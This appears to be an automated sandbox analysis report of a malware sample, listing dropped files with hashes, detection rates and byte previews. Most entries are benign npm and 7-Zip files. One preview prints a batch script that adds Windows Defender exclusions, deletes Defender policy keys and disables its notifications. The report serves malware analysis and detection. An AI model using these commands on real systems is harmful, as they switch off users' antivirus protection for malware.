              Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:data
              Category:dropped
              Size (bytes):330
              Entropy (8bit):3.135433401638173
              Encrypted:false
              SSDEEP:
              MD5:9720D87A94A2E22C478E9F583243FFAE
              SHA1:0DF5C196A51FA2675D6A3D8DB95C18CBD9732F08
              SHA-256:F36CB2C6998767D685B310B5832377CA7DF7C15693BCA767FFE6015CDE8F1AA8
              SHA-512:88C8250EAC61B195ADA8DAF0FE7ABC7287CA37DFF4ED3CD922A748174EB95F0941EA67966D7A218B1C4664249EB38472A3C8FC527941397630B19430124E9E40
              Malicious:false
              Reputation:unknown
              Preview:p...... ...........7Y...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):135000000
              Entropy (8bit):0.9327025139543955
              Encrypted:false
              SSDEEP:
              MD5:2F2B25EF8E4A739A8D4F34031620E705
              SHA1:EC07A80EDBEAE1D771B892723C070E4A9A0A7194
              SHA-256:6BF4D37DCADD6DA1652048666C0FA737398BE93EBDE1867227F3885939BF538E
              SHA-512:2128C9F0DBA1A7F87A0B870FA77622B7E4B39117196981054FA46241F6CE3DC09874D9297F475383570C31D8CF45CB4BE9A68E343CD82DE64D2871F784185E7A
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 31%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....#.f.................x............... ....@...... ....................................`...@......@............... ..................................x............................................................................................ ..H............text...0v... ...x.................. ..`.rsrc...x............z..............@..@........................................H...........D..........................................................*...(....*..0..g....... ........8........E............8....*....s....%.....(.........(....(.... ....~t...{....:....& ....8......0.......... ........8........E(.......(...b.......G.......8...y.......................O...o...............V.......5...L...........q...................z..........._...!...................-.......8......(...... ....~t...{J...99...& ....8........ ..... ....~t...{x...:....& ....8....8.... .
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
              Category:dropped
              Size (bytes):8929240
              Entropy (8bit):7.982216847674143
              Encrypted:false
              SSDEEP:
              MD5:992517A15E11AAFFC27900D8A6C64A66
              SHA1:A5C08DF2295DB41C07C8CBB8F33969B024B2BB3A
              SHA-256:C2915AE4F3A57631BE92E88D277A12C4756199EEE368DA9D4378725376D64CE5
              SHA-512:EDFBEECB147FF410880389C0EB6DEF284C115CCBE8257D7CE8061FB1ADE40A309C1B8A151D0D4E3575773F0B3AA2E29A084FCBEF9BCD440666FE82510967A6C2
              Malicious:false
              Reputation:unknown
              Preview:PK........)6{X....2?..........EdUpdMachine.exe.[.|.E...$..0LH$@....A#..3..>...E.E..._.21.E.!.(>...>..SW].]].DEeEW.....p..w.>....eW2...UwW.d@...........U....K.....S..B..#.._+=.5.J..Eo.n5&.U{.s....%.._n.>............9..S&O./.\xQ}IIt.;...q...x...bo.D.(6..X.N.H`B[(.P6%.B..xi....<k.../.....~.N,.....4...j....-...+.I...u...olj...a.#.g.:.n...~.Ne:....#.-a..y..y_T|.?7..aD$!D.cp!>$$..6..l..-5D.P.n...U...[.5E5EM......C.AD+."&.bk.).?.....5.N..;;;.1...i....b....<g.7g...Pa..../..-Z.xz.w..WS.}..Ju.Q.N....dzg.-N._Q}.=...#=.D...}-...s..{...Cr}..........m&....T.E...)..&.uTO>C...'J...._...'..........lz/.h....@...X..0...4...........I...13f........n..9{6. o..,OV..g...!l...#.!y.....E.x....J..g...U<.S..E....d..`.r.M.,...$.r'.e.Au..(.../..Q...@./....i$.7.k.V...a... ...o..Q5...Un..}L.~.;...Ir'...1..s"`.g..r.~.....|.1X.J.a,.b....9.hh.....Xd....t-...z......f.(.uJ.l..];.......u..JaT......<g._0e..x<f....L.O.('.%F.=.X5.e.~.jOS19.#...UcQZ.T.9.\s....QY..-.....q45.R4..j4.
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:modified
              Size (bytes):21948
              Entropy (8bit):5.505956750891018
              Encrypted:false
              SSDEEP:
              MD5:87D53DF6BE096E1002ACC481E0660C5E
              SHA1:D97342A003D5F93A4573017024F1C52DC5375333
              SHA-256:D9F7962764CEE12494148547F3154C85B66814727A269BA35AEBF95B1680C555
              SHA-512:6400056D2D53D615DB5FB2BB8DF6709B20D0C96848E19C0884D28758DD48A05A407AA78955BC2F9A6F84F313E57B7DEB96244BBEF051432A80AF366CC2A69A74
              Malicious:false
              Reputation:unknown
              Preview:@...e...............!................................@..........H...............o..b~.D.poM...E..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.{.....#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):253000000
              Entropy (8bit):0.17907944818085617
              Encrypted:false
              SSDEEP:
              MD5:4E1C6F4BDF64FFFA6BD810AD68B717EC
              SHA1:FAB9FDDEB07AAC4210E2CCAF516FDB6D8368091F
              SHA-256:B47509602800BA7DAA361C8FFD80CAFED8E45F0CDE20E7B88742946E68649123
              SHA-512:5F7FA45BEF5FCC3A562FF71548B8ED59E15A5298901CB65765B198F0E05C0F8986C96B761C9BED3BCCCC847A36CC0F117BFB643E9428D26274FFCC30EF1BF0C5
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 33%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e..................*.........2.+.. ... +...@.. ....................... ,...........`...................................+.J.... +...............+..)....,...................................................... ............... ..H............text...8.*.. ....*................. ..`.rsrc........ +.......+.............@..@.reloc........,.......+.............@..B..................+.....H........... @..........0....C*..........................................(....(}...*.0.......... c`..8.... .d..8....Y8....8...........9....&8.....8....8....8.....Y....o...........-.s.............o....... .,.Sa.Xffeeffefe ...m.Y.affefeeffea...-..+...o.......-M..,... y.\.X.Xffefeeffea...-..+...o.........1...(....(....,".. ag.%,.a.a.Xa.~.....`.....8.......(....,e....(....,)~......`...... W.:`.Y.Xfeffeefef.Ya.-..+a.~....`...... ....a.Yfef.9....feefefe.:O...fa.+0~......`...... [
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
              Category:dropped
              Size (bytes):7357472
              Entropy (8bit):7.869281783628456
              Encrypted:false
              SSDEEP:
              MD5:72E0C65ABC179659ACFA06D297658647
              SHA1:6E352742768A3314E1379389C2C3D4F5D504E4AD
              SHA-256:47A2103A84C2EB2949FFAB3A091CC31C385657DB8BEE806444354E015F831D3A
              SHA-512:B17077E2DD407302B2A567CD21D08CE644F2737ED3E285860C384C8C3A9B29699342E9EFAC70C1FBC14A028B35F4C815E77A162673222C17E507280F41A96270
              Malicious:false
              Reputation:unknown
              Preview:PK.........9{XgS...Q..........networkbroker.exe....\U......&..n....%. "*....{., ......B....*(."...EE..(v..ac...w.....y.s.IB...y.&{..).y.s...G...eY.>.._.]o..w`....k....."....r..#.....s..g...y.....N.>u.1.Z6s.I.?i....e'N....6.|t...c..c_.g........^..|a..|.,....e.. .9w..W....S...gG..W.7........M..=..../.?....R=..N}..Oe.?.1..c.........y.=.6.Q....M..P.....0..pv.u..W[..r.sF....KUl..F&.l..(..v.Jkfdr....8....hx..CY...6...et.......v^4k.G......J../...r#.Q..m.i........G.........1[.......U-..~....u.e.+ Y....q.../0|..d..h...w..O.?g.N..../........q.y.}.d../..b.w.r......e .....c@.=.n._c.....>..Q...w..ba.x.....6gT..Q.............{.S.......5_G'._:.l.B................-{M.....b.V,[L...|.......O..Bkv.f..=.P.z....j....E.hikk.p.>z.._.V.W|$........8Z,>.......`...R.u(.2(Z.&.^.}.......e.2.ws^.]p..K.!_.,w.....`..e.... ?._B..P....9#K.-.........e....^f.9.7/..u.....@.$..........v@F/.z.mnM..x...b.h]."?..4z..[..R..X..]w...RyW.4i.,Xf......:..uit3.thYQ5..
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):135000000
              Entropy (8bit):0.28324740669392706
              Encrypted:false
              SSDEEP:
              MD5:483ECE127784BC1780DF0A3BDF243EF7
              SHA1:E72E08B55A1731DC2D3CF8EB1C421852D6754A49
              SHA-256:58AD59910C3450E6461B57C3773E5D004F6CDD272E57F117EB64FDBCF68794C5
              SHA-512:86E0624145316631AC8F3BE9871BD7D6BA87CF4A34B7F3ED2C85B7E1853C637EFBC417165032566444B614570945A3E95C0F566369A302876876A6485FBF7E88
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 29%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...%(.f..................+.............. ....@...... .......................@,...........`...@......@............... ............................... ,.p............................................................................................ ..H............text.....+.. ....+................. ..`.rsrc...p.... ,.......+.............@..@........................................H............................|!..........................................*...(....*...(....*.0..g....... ........8........E............8....*....s....%.....(.........(....(.... ....~]...{K...:....& ....8......0.......... .......8........E&...........g...............V...;...A...D...........m...........?...+...R...............(.......................~.......b.......X...............2...N.......8.........Y<1... ....8I......... ....~]...{v...:/...& ....8$........ ....8.......X.. ........
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):2352016
              Entropy (8bit):7.983048905624335
              Encrypted:false
              SSDEEP:
              MD5:2C7CF1309E31C60D8BB7D71D1415C12A
              SHA1:F4D9C96B5D0D6E7667000783B5EF5CC1FC693F50
              SHA-256:1183F06624C56051D44F450ADBC0A573803E9A54F2B42815C815B9FE9E0E0D40
              SHA-512:D8523A7FF6597F74BDE6EBD596D61765530AC0030D90A8368416A9F7A81F0BCBC09EE2807BC874E6C66720DD2E91A4CFCD56A1AC8502420966E7E27CECF57635
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 79%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..e..................".........V.".. ....#...@.. ........................$...........`...................................".J.....#...............#..)....#...................................................... ............... ..H............text...\.".. ...."................. ..`.rsrc.........#.......".............@..@.reloc........#.......#.............@..B................<.".....H...........@..............(."..........................................(....(....*.0.......... v7}.8....8.... J...X8....8..........8....8.....8....8....8.....%,IY....o...........-..9....s.............o....... ..U.a.Yffeeffefefe O.A..Y.afefefeffea...-..+...o........,... ...>a.Yffeeffefea...-..+...o.........1...(....(....,.. ..,.X.X.Xa.~.....`.....8.......(....,]....(....,&..~....`...... .....a.affefeeffe.Ya.+[~.....`...... ...,..,.X.Xfef.94...efeffea.+/~......`....... ....a
              Process:C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):3997
              Entropy (8bit):5.1418035644388995
              Encrypted:false
              SSDEEP:
              MD5:AD8B6610172FF7B78C52F9CA37F38087
              SHA1:9E672AA0385998B41DE0EAEE280AF9372F3B299C
              SHA-256:582E18CB3C8B2C06080CBB7DF73EF27128654A4F201476F457A787CAE6B068A4
              SHA-512:2DD57FAB8F54736DFE975B7C5C83DE1C864E1F3FE498045F566F58DA059BE311CA8194C6634DF447FBCEC9382E3B67C70CC9FBC6A29076ACCDBCC1C0DE829658
              Malicious:true
              Reputation:unknown
              Preview:@shift /0..@echo off..powershell.exe -command "Add-MpPreference -ExclusionPath "%USERPROFILE%\Appdata\Local" -Force"..powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"..powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"..powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "%USERPROFILE%\Appdata\Local" -Force"..powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"..reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f..reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f..reg add "HKLM\Software\Policies\Microsoft\Windows Def
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):110
              Entropy (8bit):4.236548346705887
              Encrypted:false
              SSDEEP:
              MD5:AF5C80ED6BCCEA47E619D5EE19EFF446
              SHA1:FFBFFE96D99CD2227C376475AE26E9A269046CE3
              SHA-256:58F759505A8769B7A753530D5C2C9A52735BCBEBF76AAA14F006102D78BFAE20
              SHA-512:F23B1FE40BCBDCECB6C7C35551BE987A16D02BF430F235C4CFA010135B59DA9FB70A7EFC4E2D9D17027AA61F895ACAB7642AFEAEDBADB2EAF9AA93535C4F7482
              Malicious:false
              Reputation:unknown
              Preview:{. "licenses": {. "spdx": [. "CC-BY-3.0". ],. "blueOak": "bronze". },. "corrections": true.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):3368
              Entropy (8bit):4.9846642692772045
              Encrypted:false
              SSDEEP:
              MD5:AEC7607B554118FE5AD19FA8C2F7F314
              SHA1:0EC69C3E18A0965FE2C484F44EF35E9AE1F7399F
              SHA-256:560A8E97D64EBC2556FEAC2DEB24A96BEF722D86E3510768430D4F3D66BFF6CA
              SHA-512:D000F65C2296583944D4129191100B62B55E6CA5F18F590C4AD70AD7DAEAFFCF4E73C370F381627A5EDFB037F926519FCD4A25F10C9BC76E36D578BE65A5965B
              Malicious:false
              Reputation:unknown
              Preview:Alex K. Wolfe <alexkwolfe@gmail.com>.Andrew Bradley <cspotcode@gmail.com>.Andrew Lunny <alunny@gmail.com>.Arlo Breault <arlolra@gmail.com>.Ashley Williams <ashley@npmjs.com> <ashley666ashley@gmail.com>.Ashley Williams <ashley@npmjs.com> <ashley@bocoup.com>.Benjamin Coe <bencoe@gmail.com>.Benjamin Coe <bencoe@gmail.com> <ben@npmjs.com>.Brian White <mscdex@mscdex.net> <mscdex@gmail.com>.Cedric Nelson <cedric.nelson@gmail.com>.Charlie Robbins <charlie.robbins@gmail.com>.Claudia Hern.ndez <cghr1990@gmail.com>.Dalmais Maxence <root@ip-10-195-202-5.ec2.internal>.Danila Gerasimov <danila.gerasimov@gmail.com>.Dave Galbraith <dave@jut.io>.David Beitey <david@davidjb.com>.David Rousselie <guido.dassori@gmail.com>.Domenic Denicola <domenic@domenicdenicola.com>.Einar Otto Stangvik <einaros@gmail.com>.Emma Ramirez <ramirez.emma.g@gmail.com>.Erik Wienhold <git@ewie.name>.Evan Lucas <evan@btc.com> <evan.lucas@hattiesburgclinic.com>.Evan Lucas <evan@btc.com> <evanlucas@me.com>.Faiq Raza <faiqrazarizv
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):58305
              Entropy (8bit):4.885689974497804
              Encrypted:false
              SSDEEP:
              MD5:69A9ED93F118B332335D30F96C66F359
              SHA1:D125AD2574A90CFE50DE95D36F84014D1D0012EE
              SHA-256:83495C16B428D317EC3D27912C852F1AF4B84526F6540E579ED34EBB66364D70
              SHA-512:92625964248A543BD778AF5FAC10F48056D9ADC02C741C0FC0FD3353ABF2737CE838BC3DD08D057B86AA56A314A8C820406930B5B166497B89F321F657636201
              Malicious:false
              Reputation:unknown
              Preview:..HISTORY of the 7-Zip..--------------------....23.01 2023-06-20..-------------------------..- The page "Language" in 7-Zip's menu Tools/Options now shows information.. about selected translation, including the number of translated lines...- Some bugs were fixed.......23.00 2023-05-07..-------------------------..- 7-Zip now can use new ARM64 filter for compression to 7z and xz archives... ARM64 filter can increase compression ratio for data containing executable.. files compiled for ARM64 (AArch64) architecture... Also 7-Zip now parses executable files (that have exe and dll filename extensions).. before compressing, and it selects appropriate filter for each parsed file:.. - BCJ or BCJ2 filter for x86 executable files,.. - ARM64 filter for ARM64 executable files... Previous versions by default used x86 filter BCJ or BCJ2 for all exe/dll files...- Default section size for BCJ2 filter was changed from 64 MiB to 240 MiB... It can increase compression ratio
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):3990
              Entropy (8bit):5.0412200010833965
              Encrypted:false
              SSDEEP:
              MD5:F4995E1BC415B0D91044673CD10A0379
              SHA1:F2EEC05948E9CF7D1B00515A69C6F63BF69E9CCA
              SHA-256:F037E7689F86A12A3F5F836DC73004547C089E4A2017687E5E0B803A19E3888B
              SHA-512:E7BB1BACAB6925978416E3DA2ACB32543B16B4F0F2289CC896194598EE9ADE5C62AA746C51CF6BF4568E77E96C0A1014E4DDB968F18F95178EE8DFB1E5A72B96
              Malicious:false
              Reputation:unknown
              Preview: 7-Zip.. ~~~~~.. License for use and distribution.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.... 7-Zip Copyright (C) 1999-2023 Igor Pavlov..... The licenses for files are:.... 1) 7z.dll:.. - The "GNU LGPL" as main license for most of the code.. - The "GNU LGPL" with "unRAR license restriction" for some code.. - The "BSD 3-clause License" for some code.. 2) All other files: the "GNU LGPL"..... Redistributions in binary form must reproduce related license information from this file..... Note:.. You can use 7-Zip on any computer, including a computer in a commercial.. organization. You don't need to register or pay for 7-Zip....... GNU LGPL information.. --------------------.... This library is free software; you can redistribute it and/or.. modify it under the terms of the GNU Lesser General Public.. License as published by the Free Software Foundation; either.. version 2.1 of the License, or (at your option) any later version..... Thi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1288
              Entropy (8bit):4.707161625886281
              Encrypted:false
              SSDEEP:
              MD5:2F92528DCBE63FD03694135CE9BB7E50
              SHA1:8DB63C9B7312DD277C9021DAC5B938F384B0BBC2
              SHA-256:AAFC83D1C5BBF80EC891D2BA487B420A99A0CB46FEEA50091AFDD289F6FCED2A
              SHA-512:B5E54E0DF444DCC0C0E1F91C61F3D3FEAB219D739B61B2F94EC1E6A0F4F524A93C123C93C0817B42C65D5C2E5EEA23B057ECE47B33FD9C0CA2FB0854FE78E56E
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "@npmcli/mock-globals",. "version": "1.0.0",. "description": "",. "main": "lib/index.js",. "private": true,. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "node .. run lint -- --fix",. "snap": "tap",. "posttest": "node .. run lint". },. "repository": {. "type": "git",. "url": "https://github.com/npm/cli.git",. "directory": "mock-globals". },. "keywords": [],. "author": "GitHub Inc.",. "license": "ISC",. "bugs": {. "url": "https://github.com/npm/cli/issues". },. "homepage": "https://github.com/npm/cli#readme",. "files": [. "bin/",. "lib/". ],. "engines": {. "node": "^18.17.0 || >=20.5.0". },. "templateOSS": {. "//@npmcli/template-oss": "This file is partially managed by @npmcli/template-oss. Edits may be overwritten.",. "version": "4.19.0",. "content": "../scripts/template-oss/index.js". },.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):357
              Entropy (8bit):4.8224113106031306
              Encrypted:false
              SSDEEP:
              MD5:1F007186BE8B5260FF53B341AF5655FD
              SHA1:1858997A42CEA3D5F66C92CD4E2C709A1F96EB4B
              SHA-256:191B99C3205D8862BD3A11AF48CFE1DD884203817D109E5CA0817A743CC3D6A1
              SHA-512:FB3B32D9811BE0EE8D27C5BBEBDEFB70607501157365E9B680AD4EAEFB0B3024920D21DEF3E8C918E718B1B693BD81945D9E680388EF3F076A719F50A5E01BA3
              Malicious:false
              Reputation:unknown
              Preview:/* This file is automatically added by @npmcli/template-oss. Do not edit. */..'use strict'..const { readdirSync: readdir } = require('fs')..const localConfigs = readdir(__dirname). .filter((file) => file.startsWith('.eslintrc.local.')). .map((file) => `./${file}`)..module.exports = {. root: true,. extends: [. '@npmcli',. ...localConfigs,. ],.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):68
              Entropy (8bit):4.24187525468611
              Encrypted:false
              SSDEEP:
              MD5:E6A8F08380C7491FD758DDEB427B4FAC
              SHA1:80DFD629A08827936D4F76C85431248EA5E7C657
              SHA-256:820A2A6AC56E7D7D6F860C78B3EE4D7951EA340039695F6BEF50B33A5C93E522
              SHA-512:3E3EA51C0C5D2E884A2C6E6A1B00C5D865EC4FA72E7AC89FE20B22C0B95A0EDACBC190D9E6D4326C3ED14DE2EE68D86083E717ADBB7CDA1E93215754B31B9CB9
              Malicious:false
              Reputation:unknown
              Preview:{. "rules": {. "import/no-extraneous-dependencies": "off". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):302
              Entropy (8bit):4.861116444009598
              Encrypted:false
              SSDEEP:
              MD5:8DA13F306C8C0F4F4A32960E93725B42
              SHA1:B9EE3F4A8B64284A8F698206993E4EC2CF83F66F
              SHA-256:CA7A3D5544BEB40BEB598F6AE22527E8CBCBC29B67F241AD9E572A50A89848B0
              SHA-512:59E6493139D8A3AF2889FB337032F41124A53F5CA7EE06906C97D4F6CF0FA942F28B3B7CE2D449B10EA0A01A39282397984EA46DF43571D2A5FE753FC20BB6CC
              Malicious:false
              Reputation:unknown
              Preview:# This file is automatically added by @npmcli/template-oss. Do not edit...# ignore everything in the root./*..# keep these.!**/.gitignore.!/.eslintrc.js.!/.eslintrc.local.*.!/.gitignore.!/bin/.!/CHANGELOG*.!/docs/.!/lib/.!/LICENSE*.!/map.js.!/package.json.!/README*.!/scripts/.!/tap-snapshots/.!/test/.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):12170
              Entropy (8bit):4.721827629238467
              Encrypted:false
              SSDEEP:
              MD5:4A748B4C103FC82268D3FAAF4A4B26F8
              SHA1:A307F8A37EEA9FF272BC79100EC87EBDD2546202
              SHA-256:829D73E78B61C44121B3470EB5355C8F1C88D932EEA0B9108BF9DEA9389FAABF
              SHA-512:2FDD0C724BA890A5DC0B7663C7925B52EA2D5077EA67EFB53930CF77AB5C3E04AFFD4B78F3FB94BABB9EC3E8E9C5E8C540C9FFF34D7797B52D78CBB2A0F029DB
              Malicious:false
              Reputation:unknown
              Preview:const pacote = require('pacote').const Arborist = require('@npmcli/arborist').const npa = require('npm-package-arg').const Nock = require('nock').const stringify = require('json-stringify-safe')..class MockRegistry {. #tap. #nock. #registry. #authorization. #basic. #debug. #strict.. constructor (opts) {. if (!opts.registry) {. throw new Error('mock registry requires a registry value'). }. this.#registry = new URL(opts.registry). this.#authorization = opts.authorization. this.#basic = opts.basic. this.#debug = opts.debug. this.#strict = opts.strict. // Required for this.package. this.#tap = opts.tap. if (this.#tap) {. this.startNock(). }. }.. static tnock (t, host, opts, { debug = false, strict = false } = {}) {. const noMatch = (req) => {. if (debug) {. console.error('NO MATCH', t.name, req.options ? req.options : req.path). }. if (strict) {. // There are network requests that get caught regardless of
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1388
              Entropy (8bit):4.742293268664244
              Encrypted:false
              SSDEEP:
              MD5:F66E40E2056B291BB482C9CA2D889D8D
              SHA1:03DBB985DF305C3925967E28F310E4697FD6D9DF
              SHA-256:69C7444CC910CB9B46FE2E6516C7FD145EFE95211DCABA8AD58D964BAFA5C993
              SHA-512:50327AC29463C7A222B70283E6B252C685B0EB524E6ACD71109B87BAD3FE94C82624D59AEA70F5C821EC5CC79DBE6B42C986187BF3E51E71BFCBEA496A89F382
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "@npmcli/mock-registry",. "version": "1.0.0",. "description": "",. "main": "lib/index.js",. "private": true,. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "node .. run lint -- --fix",. "snap": "tap",. "posttest": "node .. run lint". },. "repository": {. "type": "git",. "url": "https://github.com/npm/cli.git",. "directory": "mock-registry". },. "keywords": [],. "author": "GitHub Inc.",. "license": "ISC",. "bugs": {. "url": "https://github.com/npm/cli/issues". },. "homepage": "https://github.com/npm/cli#readme",. "files": [. "bin/",. "lib/". ],. "engines": {. "node": "^18.17.0 || >=20.5.0". },. "templateOSS": {. "//@npmcli/template-oss": "This file is partially managed by @npmcli/template-oss. Edits may be overwritten.",. "version": "4.19.0",. "content": "../scripts/template-oss/index.js". },.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):172
              Entropy (8bit):4.633055295103262
              Encrypted:false
              SSDEEP:
              MD5:61527DCDDB9C0FDD302A7060A0E9FB3C
              SHA1:03A8D5AD38EB0A50295C20A119E5DF88BD2AEFFF
              SHA-256:7C6C7369C51AFEA2FA5246C8521B35788F8994F9A43B786BFF6E28D1C70E1C2F
              SHA-512:927F7E2A232AD2DA71DC1C5DE24BB338185E18B08CBB4F73EA20606C1B10A272E9C164F2B7A56F95BE467ECBC87E8A64EEF4F9961864C49EDF9D235C2B2139A3
              Malicious:false
              Reputation:unknown
              Preview:const t = require('tap').const MockRegistry = require('..')..t.test('it works', async t => {. t.ok(new MockRegistry({. registry: 'http://registry.npmjs.org/',. })).}).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6735
              Entropy (8bit):4.653173909702924
              Encrypted:false
              SSDEEP:
              MD5:BB6D4E8378742BC653706C01C59256D9
              SHA1:0D70B4BC32BE5A05ABB6ABA87BDC2BD0C2B0E1FF
              SHA-256:C6189C8740542CD5B8164650DC6CB9BBE28914DC3F6B8BB5ACC52C22C5EAB92B
              SHA-512:084E3A327AA4197991D0B28486298C047636A37D2CD6D72BEFDE3D88F21210A9C6DA625A9207C142B1095C88D12F341F619F772969C76CDCBD50A0DEDBA89AE7
              Malicious:false
              Reputation:unknown
